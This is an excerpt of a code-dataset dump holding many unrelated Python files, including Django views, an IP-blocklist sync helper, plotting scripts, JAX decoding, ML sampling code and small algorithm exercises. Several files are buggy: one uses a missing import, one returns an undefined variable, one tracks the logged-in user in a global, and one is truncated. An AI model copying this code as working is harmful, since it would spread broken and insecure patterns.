render(request,'changeProduct.html',\n {'price_form':price_form,\n 'registered':registered})\n\n\n'''\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db() # load the profile instance created by the signal\n user.profile.birth_date = form.cleaned_data.get('birth_date')\n user.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect('home')\n 
else:\n form = SignUpForm()\n return render(request, 'signup.html', {'form': form})\n'''\ndef index(request):\n global currentUser\n curr = currentUser\n print(curr)\n \n profile_name = cursor.execute('SELECT username, id FROM theApp_myuser WHERE id = %s', [currentUser]).fetchall()[0][0]\n most_sold = Stocks.objects.raw('SELECT * From theApp_stocks ORDER BY sold DESC LIMIT 5')\n print(most_sold)\n #SELECT * FROM table1 WHERE id IN (SELECT MAX(num1+num2) FROM table2) ORDER BY id DESC limit 5\n flowers = Flower.objects.raw('SELECT * From theApp_flower ORDER BY price DESC LIMIT 4')\n # make magic\n # print(request.user.username) \n #random_flowers = random.sample(flowers, 5)\n categories = Category.objects.raw('SELECT * From theApp_category')\n print(categories)\n context = {\"profile_name\": profile_name, \"most_sold\": most_sold, \"flowers\": flowers, \"categories\": categories} # todo\n return render(request, 'index.html', context)\n\ndef seller(request, pk):\n products = cursor.execute('SELECT flower_id_id FROM theApp_products WHERE seller_id_id = %s AND count > 0', [pk]).fetchall()\n seller = pk #?\n categories = cursor.execute('SELECT * From theApp_category').fetchall()\n context = {\"products\": products, \"seller\": seller, \"categories\": categories} # todo\n return render(request, 'seller.html', context)\n\ndef products(request):\n categories = Category.objects.raw('SELECT * From theApp_category')\n flowers = Flower.objects.raw('SELECT * From theApp_flower')\n # make magic\n context = {\"flowers\": flowers, \"categories\": categories}\n return render(request, 'products.html', context)\n\ndef product(request, pk):\n #flower_id = pk.flower_id\n #profile_name = myUser.objects.raw('SELECT username From theApp_myUser WHERE id = %s', currentUser) # from profile user alma bakilacak\n #favorite_flowers = Faw_Flow.objects.raw('SELECT * From theApp_Faw_Flow WHERE id = %s', currentUser) # from profile get favorited\n print(pk)\n flow_id = cursor.execute('Select flower_id From theApp_flower WHERE photo_id = %s', [pk]).fetchall()[0][0]\n flower = cursor.execute('SELECT photo_id, description, flower_type, flower_id, occasion, price From theApp_flower WHERE photo_id = %s', [pk]).fetchall() # specific flower with pk\n ph_id = flower[0][0]\n desc = flower[0][1]\n fType = flower[0][2]\n occ = flower[0][4]\n price = flower[0][5]\n stock = cursor.execute('SELECT count, id FROM theApp_stocks WHERE flower_id_id = %s', [flow_id]).fetchall()[0][0] # get flower stock\n \n context = {\"flower\": flower , \"stock\": stock, \"ph_id\": ph_id, \"desc\": desc, \"fType\": fType, \"occ\": occ, \"price\": price} # todo\n\n return render(request, 'product.html', context)\n\ndef profile(request):\n global currentUser\n userInfo = myUser.objects.raw('SELECT * FROM theApp_myuser WHERE id = %s', currentUser) # get profile\n #userInfoTup = cursor.fetchall()[0]\n orders = Order.objects.raw(\"SELECT id, price, note, date FROM theApp_order WHERE customer_id = %s\", currentUser) # get orders\n #ordersTup = cursor.fetchall()\n favorites = Flower.objects.raw(\"SELECT F.flower_type FROM myApp_flower F WHERE F.flower_id IN (SELECT F.flower_id FROM myApp_faw_flow WHERE id = %s)\", currentUser) # get favorite flowers from fav\n #favTup = cursor.fetchall()\n complaints = Complaint_Report.objects.raw(\"SELECT order_id_id, status, subject FROM myApp_complaint_report WHERE cust_id_id = %s\", currentUser) # get all complaints with user id\n #complaintTup = cursor.fetchall()\n context = {\"temp\": temp}\n return render(request, 
'profile.html', context)\n\ndef about(request):\n return render(request, 'about.html')\n\ndef order(request, pks):\n # pks is a list\n stocks = "todo" # get stocks of flowers\n chocolate = "todo" # get chocolate\n context = {"stocks": stocks, "chocolate": chocolate}\n return render(request, 'order.html', context)\n\ndef loginSign(request):\n return render(request, 'login.html')\n\ndef changePassword(request):\n return render(request, 'changePass.html')\n\ndef forum(request):\n forumTopics = Forum_Topic.objects.raw('SELECT * FROM theApp_forum_Topic') # get from forum topics table\n #forumCategories = "todo" # get categories from forum categories\n context = {"forumTopic": forumTopics}\n return render(request, 'forum.html', context)\n\ndef postEntry(request, pk):\n postEntry = Forum_Entry.objects.raw('SELECT * FROM theApp_forum_Entry WHERE topic_id = %s' , pk)\n context = {'postEntry': postEntry}\n return render(request, 'postEntry.html',context)\n\ndef forumTopic(request, pk):\n forumTopics = Forum_Topic.objects.raw('SELECT * FROM theApp_forum_Topic WHERE topic_id = %s' , pk) # get from forum topics table\n entries = Forum_Entry.objects.raw('SELECT * FROM theApp_forum_Entry WHERE topic_id = %s' , pk)\n context = {'forumTopic': forumTopics, 'entries': entries}\n return render(request, 'forumTopic.html', context)\n\ndef createTopic(request):\n forumCategories = "todo"\n context = {'forumCategories': forumCategories}\n return render(request, 'createTopic.html', context)\n\n\ndef myOrders(request):\n orders = "todo" # Get orders from order delivery\n flower = "todo" # get all flowers\n # then select from orders\n # do this \n context = {"orders": orders, "flower": flower}\n return render(request, 'myOrders.html', context)\n\ndef customerService(request):\n reports = Complaint_Report.objects.raw('SELECT order_id_id, subject, status, cust_id_id FROM Complaint_Report') # get reports from Complaint_Report\n username = myUser.objects.raw('SELECT Username FROM theApp_myuser WHERE id IN (SELECT cust_id FROM Complaint_Report)') # get username with user id from the reports\n context = {"reports": reports, "username": username}\n return render(request, 'customerService.html', context)\n\ndef customerReport(request, pk):\n # using pk get info\n context = {}\n return render(request, 'customerReport.html', context)\n\n\n# Create your views here.\n","sub_path":"src/theApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232766188","text":"\nfrom django.conf.urls import url\n#from user import views\nfrom user.views import RegisterView,ActiveView,LoginView\napp_name = 'user'\nurlpatterns = [\n\n #url(r'^register$',views.register,name='register'),# registration page\n #url(r'^register_handle$',views.register_handle,name='register_handle')# user clicks register\n url(r'^register$',RegisterView.as_view(),name='register'),\n url(r'^active/(?P<token>.*)$',ActiveView.as_view(),name='active'),\n url(r'^login$',LoginView.as_view(),name='login')\n]\n","sub_path":"apps/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262052797","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'tinopf@gmail.com'\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pymongo as mg\r\n\r\n# Constants\r\nSERVER = \"mongodb://localhost:27017/\"\r\n\r\n\r\ndef plot_results_dataset():\r\n \"\"\"\r\n Read data from a MongoDB collection with a set of points and return a list of Point objects\r\n :param 
dir_dataset:\r\n \"\"\"\r\n mongoClient = mg.MongoClient(SERVER)\r\n\r\n db = mongoClient[\"CLUSTERING\"]\r\n coleccion = db[\"FOURSQUARE_TotalVisits_AGGREGATE_SUBWAY\"]\r\n\r\n pipeline = [\r\n { \"$limit\": 100 },\r\n { \"$group\": { \"_id\": \"$VenueID\", \"total\": { \"$sum\": \"$VisitasTotales\" } } },\r\n { \"$sort\": { \"total\": -1 } }\r\n ]\r\n cursor = coleccion.aggregate(pipeline)\r\n datos = list(cursor)\r\n\r\n venues = list()\r\n visitas = list()\r\n for documento in datos:\r\n venues.append(documento['_id'])\r\n visitas.append(float(documento['total']))\r\n\r\n plt.plot(venues, visitas, 'ro-', markersize=8, lw=2)\r\n plt.grid(True)\r\n plt.show()\r\n\r\n\r\ndef loadData():\r\n plot_results_dataset()\r\n\r\n\r\nif __name__ == '__main__':\r\n loadData()","sub_path":"clustering/python/PlotAggregatedData.py","file_name":"PlotAggregatedData.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476508662","text":"import matplotlib\n\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport typing\n\n\ndef create_failure_pie_chart(questions: typing.List[str], failures: typing.List[int], title: str, filename: str):\n\tplt.figure(figsize=(11, 7))\n\twedges, texts, val = plt.pie(failures, wedgeprops=dict(width=0.5), autopct='%1.0f%%', pctdistance=1.1, colors=['#209cee', '#00d1b2','#23d160', '#ff3860','#9467bd','#8c564b','#e377c2'],\n\t# wedges, texts, val = plt.pie(failures, wedgeprops=dict(width=0.5), autopct='%1.0f%%', pctdistance=1.1, \n\t\t\t\t\t\t\t\t startangle=-40)\n\n\tbbox_props = {\n\t\t'boxstyle': 'square,pad=0.3',\n\t\t'fc': 'w',\n\t\t'ec': 'k',\n\t\t'lw': 0.72\n\t}\n\n\tkw = {\n\t\t'arrowprops': {\n\t\t\t'arrowstyle': '-'\n\t\t},\n\t\t'bbox': bbox_props,\n\t\t'zorder': 0,\n\t\t'va': 'center'\n\t}\n\n\tplt.title(title, fontsize=15, weight='bold')\n\n\tplt.legend(\n\t\twedges,\n\t\tquestions,\n\t\tloc='upper center',\n\t\tbbox_to_anchor=(0.5, -0.00),\n\t\tfancybox=True\n\t)\n\n\tplt.savefig(filename, bbox_inches='tight')\n","sub_path":"src/mqmcharts/piefailures.py","file_name":"piefailures.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"233500531","text":"import jax\nimport jax.numpy as jnp\n\n@partial(jax.jit, static_argnums = (1,2,3,))\ndef greedy(key, pure_logits_fn, config, params, initial_token_ids, *args, **kwargs):\n \n token_ids = initial_token_ids\n for i in range(config['max_length']):\n \n key, subkey = jax.random.split(key)\n logits = pure_logits_fn.apply(params, subkey, token_ids, *args, **kwargs)\n \n predictions = jnp.argmax(logits[:,i,:], axis=-1)\n \n token_ids = jax.ops.index_update(token_ids, jax.ops.index[:,i,:],\n predictions)\n return token_ids\n\n\n ","sub_path":"src/model/decoding_algos.py","file_name":"decoding_algos.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"619064050","text":"import json\r\nimport itertools\r\nimport re\r\nimport os\r\nimport netaddr\r\nimport logging\r\nfrom multiprocessing import Semaphore, cpu_count\r\n\r\n\r\nclass General:\r\n def __init__(self):\r\n # Regular expressions\r\n self.added_ip_re = re.compile(r\"(?<=\\+)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(?=(?!/)\\D|$)\")\r\n self.added_net_re = 
re.compile(r\"(?<=\\+)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2])){1}(?=\\D|$)\")\r\n self.removed_ip_re = re.compile(r\"(?<=-)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(?=(?!/)\\D|$)\")\r\n self.removed_net_re = re.compile(r\"(?<=-)(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2])){1}(?=\\D|$)\")\r\n self.ip_re = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$\")\r\n self.net_re = re.compile(\"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(/([0-9]|[1-2][0-9]|3[0-2]))$\")\r\n self.not_periodic_feed_re = re.compile(r\"^(?!.*_\\d{1,3}d(\\.ipset|\\.netset)).*(\\.ipset|\\.netset)$\")\r\n self.uniq_ips_re = re.compile(r\"(?<=\\ )(\\d*)(?= unique IPs)\")\r\n\r\n # Application configuration\r\n self.config = self.load_config(\"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"conf/app.conf\"))\r\n self.database_user = self.config.get(\"pg_database_user\")\r\n self.database_password = self.config.get(\"pg_database_password\")\r\n self.database_name = self.config.get(\"pg_database_name\")\r\n self.server_address = self.config.get(\"pg_server_address\")\r\n self.firehol_ipsets_git = self.config.get(\"firehol_ipsets_git\")\r\n self.sync_period_h = self.config.get(\"sync_period_h\")\r\n self.unique_ips_limit = self.config.get(\"unique_ips_limit\")\r\n\r\n # FireHOL repo path\r\n self.repo_path = \"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"git/firehol\")\r\n\r\n # Logger configuration\r\n self.log_path = \"%s/%s\" % (os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"log/run.log\")\r\n self.logger = logging.getLogger(__name__)\r\n self.formatter = logging.basicConfig(filename=self.log_path, level=logging.INFO,\r\n format=\"%(asctime)s [%(levelname)s] [%(filename)s] %(funcName)s: %(message)s\")\r\n\r\n def load_config(self, config):\r\n with open(config) as file_obj:\r\n return json.load(file_obj)\r\n\r\n def read_file(self, filename):\r\n with open(filename) as f:\r\n for line in f:\r\n yield line.strip(\"\\n\")\r\n\r\n def group_by(self, n, iterable):\r\n it = iter(iterable)\r\n\r\n while True:\r\n chunk = tuple(itertools.islice(it, n))\r\n if not chunk:\r\n return\r\n yield chunk\r\n\r\n def iterate_net(self, net_raw):\r\n for ip in netaddr.IPNetwork(net_raw).iter_hosts():\r\n yield str(ip)\r\n\r\n def validate_request(self, request):\r\n if self.net_re.match(request) or self.ip_re.match(request):\r\n\r\n return True\r\n\r\n def get_cpu_count(self):\r\n return Semaphore(cpu_count()).get_value()\r\n\r\n def get_files(self, directory):\r\n files = list()\r\n\r\n for file in os.listdir(directory):\r\n files.append(os.path.join(directory, file))\r\n\r\n return files\r\n\r\n def extend_result_data(self, results, currently_presented_count=0):\r\n bunched_dict = dict()\r\n extended_results = list()\r\n\r\n for dictionary in results:\r\n current_status = \"absent\"\r\n\r\n if not dictionary.get(\"last_removed\"):\r\n current_status = \"present\"\r\n\r\n elif dictionary.get(\"last_added\") > dictionary.get(\"last_removed\"):\r\n current_status = \"present\"\r\n\r\n dictionary.update({\r\n \"current_status\": current_status\r\n })\r\n\r\n bunching_element = dictionary.pop(\"ip\", 
None)\r\n bunched_dict.setdefault(bunching_element, []).append(dictionary)\r\n\r\n for bunching_element, value in bunched_dict.items():\r\n currently_blacklisted = False\r\n\r\n for dictionary in value:\r\n if dictionary.get(\"current_status\", None) == \"present\":\r\n currently_blacklisted = True\r\n currently_presented_count += 1\r\n\r\n break\r\n\r\n extended_results.append({\r\n \"ip\": bunching_element,\r\n \"categories\": list(set([dictionary.get(\"category\") for dictionary in bunched_dict[bunching_element]])),\r\n \"first_seen\": sorted(list(set([dictionary.get(\"first_seen\") for dictionary in bunched_dict[bunching_element]])))[0],\r\n \"last_added\": sorted(list(set([dictionary.get(\"last_added\") for dictionary in bunched_dict[bunching_element]])), reverse=True)[0],\r\n \"hits_count\": len(value),\r\n \"currently_blacklisted\": currently_blacklisted,\r\n \"hits\": bunched_dict.get(bunching_element, None)\r\n })\r\n\r\n return extended_results, currently_presented_count\r\n","sub_path":"app/modules/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45564368","text":"from __future__ import division\nfrom scipy.stats import triang\nfrom scipy.stats import norm\nfrom scipy.stats import uniform\nfrom sklearn import preprocessing\n\nfrom cea.utilities import latin_hypercube\nimport pandas as pd\nimport numpy as np\nimport numpy.ma as ma\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef latin_sampler(locator, num_samples, variables):\n \"\"\"\n This script creates a matrix of m x n samples using the latin hypercube sampler.\n for this, it uses the database of probability distribtutions stored in locator.get_uncertainty_db()\n it returns clean and normalized samples.\n\n :param locator: pointer to locator of files of CEA\n :param num_samples: number of samples to do\n :param variables: list of variables to sample\n :return:\n 1. design: a matrix m x n with the samples where each feature is normalized from [0,1]\n 2. design_norm: a matrix m x n with the samples where each feature is normalized from [0,1]\n 3. 
pdf_list: a dataframe with properties of the probability density functions used in the exercise.\n\n \"\"\"\n\n # get probability density function PDF of variables of interest\n variable_groups = ('ENVELOPE', 'INDOOR_COMFORT', 'INTERNAL_LOADS','SYSTEMS')\n database = pd.concat([pd.read_excel(locator.get_uncertainty_db(), group, axis=1)\n for group in variable_groups])\n pdf_list = database[database['name'].isin(variables)].set_index('name')\n\n # get number of variables\n num_vars = pdf_list.shape[0] # alternatively use len(variables)\n\n # get design of experiments\n samples = latin_hypercube.lhs(num_vars, samples=num_samples, criterion='maximin')\n for i, variable in enumerate(variables):\n\n distribution = pdf_list.loc[variable, 'distribution']\n #sampling into lhs\n min = pdf_list.loc[variable, 'min']\n max = pdf_list.loc[variable, 'max']\n mu = pdf_list.loc[variable, 'mu']\n stdv = pdf_list.loc[variable, 'stdv']\n if distribution == 'triangular':\n loc = min\n scale = max - min\n c = (mu - min) / (max - min)\n samples[:, i] = triang(loc=loc, c=c, scale=scale).ppf(samples[:, i])\n elif distribution == 'normal':\n samples[:, i] = norm(loc=mu, scale=stdv).ppf(samples[:, i])\n elif distribution == 'boolean': # converts a uniform (0-1) into True/False\n samples[:, i] = ma.make_mask(np.rint(uniform(loc=min, scale=max).ppf(samples[:, i])))\n else: # assume it is uniform\n samples[:, i] = uniform(loc=min, scale=max).ppf(samples[:, i])\n\n min_max_scaler = preprocessing.MinMaxScaler(copy=True, feature_range=(0, 1))\n samples_norm = min_max_scaler.fit_transform(samples)\n\n return samples, samples_norm, pdf_list\n","sub_path":"legacy/calibration/latin_sampler.py","file_name":"latin_sampler.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280429433","text":"import librosa\nimport os\naudio_path = '/home/helin.wang/audioset/audioset_raw/download/train'\nlistx=[]\nfor root, dirs, files in os.walk(audio_path):\n for x in files:\n audio = audio_path+ '/'+x\n time = librosa.get_duration(filename=audio)\n if(time>0):\n print(x)\n listx.append(x)\nprint(len(listx))","sub_path":"download/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"177065393","text":"import tensorflow as tf\n\nfrom Model.Graph.Graph import deepNN\nfrom Model.ModelDataGenerator import ModelDataGenerator\n\n\nclass TestModel:\n def __init__(self):\n self.model_data_generator = ModelDataGenerator()\n\n def main(self):\n\n tf.reset_default_graph()\n\n # Build the graph for the deep net\n with tf.name_scope('inputs'):\n x = tf.placeholder(tf.float32, [None, self.model_data_generator.input_length])\n y_ = tf.placeholder(tf.float32, [None, self.model_data_generator.class_count])\n\n\n with tf.name_scope('model'):\n y_conv = deepNN(x, False, self.model_data_generator.class_count)\n\n x_shape = [-1, self.model_data_generator.input_length]\n\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=1, save_relative_paths=True)\n\n sess = tf.Session()\n # First let's load meta graph and restore weights\n saver = tf.train.import_meta_graph('../logs/exp_bs_100/model.ckpt-1999.meta')\n saver.restore(sess, tf.train.latest_checkpoint('../logs/exp_bs_100/'))\n\n (testImages, testLabels) = self.model_data_generator.getValidationBatch()\n\n prediction = tf.argmax(y_conv, 1)\n labels = sess.run(prediction,\n feed_dict={x: 
testImages.reshape(x_shape), y_: testLabels})\n\n print(labels)\n\n\n\nif __name__ == \"__main__\":\n s = TestModel()\n s.main()\n\n","sub_path":"Code/Model/ModelTesting/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310089228","text":"#! /usr/bin/env python3\n\nimport random\nimport time\nfrom E160_environment import *\nfrom E160_graphics import *\n\ndef main(): \n \n # instantiate robot navigation classes\n environment = E160_environment()\n graphics = E160_graphics(environment)\n \n # set time step size in seconds\n deltaT = 0.1\n simRate = 100\n # loop over time\n while True:\n # update graphics, but stop the thread if user stopped the gui\n if not graphics.update():\n break\n \n # update robots\n environment.update_robots(deltaT)\n \n # log all the robot data\n environment.log_data()\n \n # maintain timing\n time.sleep(deltaT/simRate)\n \nmain()\n","sub_path":"Code/E160_gui.py","file_name":"E160_gui.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59540584","text":"import sys\n\n\ndef sol():\n input = sys.stdin.readline\n _, M = map(int, input().split())\n trees = list(map(int, input().split()))\n trees_count = dict()\n for tree in trees:\n if tree not in trees_count:\n trees_count[tree] = 0\n trees_count[tree] += 1\n trees_set = set(trees)\n low = 0\n high = max(trees)\n result = -1\n while low <= high:\n mid = (low + high) // 2\n total_length = sum(\n [(tree - mid) * trees_count[tree] for tree in trees_set if tree >= mid]\n )\n if total_length < M:\n high = mid - 1\n else:\n low = mid + 1\n result = mid\n print(result)\n\n\nif __name__ == \"__main__\":\n sol()\n","sub_path":"2805/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463146042","text":"# select all the records from the Customer table\nfrom accounts.models import *\n\ncustomer = customer.objects.all()\n# print(customer)\n# selct first customer from the customer table\nFirstCustomer = customer.objects.first()\n# print(FirstCustomer)\n# select last customer from the customer table\nLastCustomer = customer.objects.last()\n# print(LastCustomer)\n\n# Return single customer by name\ncustomerByName = customer.objects.get(name='Rakesh')\n# print(customerByName)\n# Return single customer by id\ncustomerById = customer.objects.get(id='10')\n# print(customerById)\n\n# Return all the orders related to customer(variable FirstCustomer is given)\nFirstCustomer.order_set.all()\n\n# Return orders customer\n\n","sub_path":"crm/accounts/querydemo.py","file_name":"querydemo.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634386098","text":"import bcrypt\nimport collections\nfrom functools import wraps\nimport json\nfrom random import SystemRandom\nimport re\nimport string\n\nimport flask\nfrom userdatamodel.driver import SQLAlchemyDriver\nfrom werkzeug.datastructures import ImmutableMultiDict\n\nfrom fence.models import Client, User\nfrom fence.jwt.token import CLIENT_ALLOWED_SCOPES\n\nrng = SystemRandom()\nalphanumeric = string.ascii_uppercase + string.ascii_lowercase + string.digits\n\n\ndef random_str(length):\n return ''.join(rng.choice(alphanumeric) for _ in 
xrange(length))\n\n\ndef json_res(data):\n return flask.Response(json.dumps(data), mimetype='application/json')\n\n\ndef create_client(\n username, urls, DB, name='', description='', auto_approve=False,\n is_admin=False):\n driver = SQLAlchemyDriver(DB)\n client_id = random_str(40)\n client_secret = random_str(55)\n hashed_secret = bcrypt.hashpw(client_secret, bcrypt.gensalt())\n with driver.session as s:\n user = s.query(User).filter(User.username == username).first()\n if not user:\n user = User(username=username, is_admin=is_admin)\n s.add(user)\n if s.query(Client).filter(Client.name == name).first():\n raise Exception('client {} already exists'.format(name))\n return\n client = Client(\n client_id=client_id, client_secret=hashed_secret,\n user=user, _redirect_uris=urls,\n _allowed_scopes=' '.join(CLIENT_ALLOWED_SCOPES),\n description=description, name=name, auto_approve=auto_approve)\n s.add(client)\n s.commit()\n return client_id, client_secret\n\n\ndef drop_client(client_name, db):\n driver = SQLAlchemyDriver(db)\n with driver.session as s:\n clients = s.query(Client).filter(Client.name == client_name)\n clients.delete()\n s.commit()\n\n\ndef hash_secret(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n has_secret = 'client_secret' in flask.request.form\n has_client_id = 'client_id' in flask.request.form\n if flask.request.form and has_secret and has_client_id:\n form = flask.request.form.to_dict()\n with flask.current_app.db.session as session:\n client = (\n session\n .query(Client)\n .filter(Client.client_id == form['client_id'])\n .first()\n )\n if client:\n form['client_secret'] = bcrypt.hashpw(\n form['client_secret'].encode('utf-8'),\n client.client_secret.encode('utf-8')\n )\n flask.request.form = ImmutableMultiDict(form)\n\n return f(*args, **kwargs)\n\n return wrapper\n\n\ndef wrap_list_required(f):\n @wraps(f)\n def wrapper(d, *args, **kwargs):\n data_is_a_list = False\n if isinstance(d, list):\n d = {'data': d}\n data_is_a_list = True\n if not data_is_a_list:\n return f(d, *args, **kwargs)\n else:\n result = f(d, *args, **kwargs)\n return result['data']\n return wrapper\n\n\n@wrap_list_required\ndef convert_key(d, converter):\n if isinstance(d, str) or not isinstance(d, collections.Iterable):\n return d\n\n new = {}\n for k, v in d.iteritems():\n new_v = v\n if isinstance(v, dict):\n new_v = convert_key(v, converter)\n elif isinstance(v, list):\n new_v = list()\n for x in v:\n new_v.append(convert_key(x, converter))\n new[converter(k)] = new_v\n return new\n\n\n@wrap_list_required\ndef convert_value(d, converter):\n if isinstance(d, str) or not isinstance(d, collections.Iterable):\n return converter(d)\n\n new = {}\n for k, v in d.iteritems():\n new_v = v\n if isinstance(v, dict):\n new_v = convert_value(v, converter)\n elif isinstance(v, list):\n new_v = list()\n for x in v:\n new_v.append(convert_value(x, converter))\n new[k] = converter(new_v)\n return new\n\n\ndef to_underscore(s):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', s)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef strip(s):\n if isinstance(s, str):\n return s.strip()\n return s\n","sub_path":"fence/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292053677","text":"import sys\n\nbirth = {}\n\ndef test():\n for line in sys.stdin:\n line = line.strip()\n #print(line)\n tokens = line.split()\n print(tokens)\n m = int(tokens[1])\n if birth.get(m):\n birth[m] 
+= 1\n else:\n birth[m] = 1\n #print(birth)\n for i in range(1,13):\n print(i,birth.get(i))\n\ntest() ","sub_path":"dict_3.py","file_name":"dict_3.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"365495217","text":"#first pick a number, move everything smaller than it to the left and everything larger to the right, then recurse until the whole list is sorted\n#pay attention to: 1. the termination condition, 2. how to move elements, 3. how to obtain the new pivot\ndef quickSort(start,end,nums):\n #termination condition of the recursion\n if start>=end:\n return \n #returns the index of the new pivot\n pi = partition(start,end,nums)\n #split at the new pivot index and recurse on the left and right parts\n quickSort(start,pi-1,nums)\n quickSort(pi+1,end,nums)\n \n\ndef partition(start,end,nums):\n #use the start element as the pivot each time\n pivot = nums[start]\n #mark is the index to move\n mark = start\n \n #iterate over the current range\n for i in range(start+1,end+1):\n #if the element is smaller\n if nums[i]-fix.py","file_name":"fba4f831bc75369c975a95c9b7774e9e89f8a2f9-<__init__>-fix.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523791725","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.urlresolvers import reverse\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\n\n\nclass RegisterForm(UserCreationForm):\n email = forms.EmailField(\n label='E-mail',\n required=True\n )\n\n def __init__(self, *args, **kwargs):\n self.helper = FormHelper()\n self.helper.form_id = 'register-form'\n self.helper.form_method = 'post'\n self.helper.form_action = reverse('register')\n\n self.helper.add_input(Submit('registrar', 'Registrar'))\n super(RegisterForm, self).__init__(*args, **kwargs)\n\n def save(self, commit=True):\n user = super(UserCreationForm, self).save(commit=False)\n user.email = self.cleaned_data.get('email')\n if commit:\n user.save()\n return user\n","sub_path":"src/core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155511869","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('module/', views.module, name=\"module\"),\n path('singleton/', views.singleton, name=\"singleton\"),\n path('factory/', views.factory, name=\"factory\"),\n path('observer/', views.observer, name=\"observer\"),\n path('mediator/', views.mediator, name=\"mediator\"),\n path('state/', views.state, name=\"state\"),\n]\n","sub_path":"Traversy/javascript/patterns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"217720609","text":"\"\"\"\n\nGiven an array of integers, find two numbers such that they add up to a specific target number.\n\n\"\"\"\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n for count,elem in enumerate(nums):\n if target-elem in nums[count+1:]:\n index1=count+1\n index2=nums[count+1:].index(target-elem)+index1+1\n break\n return 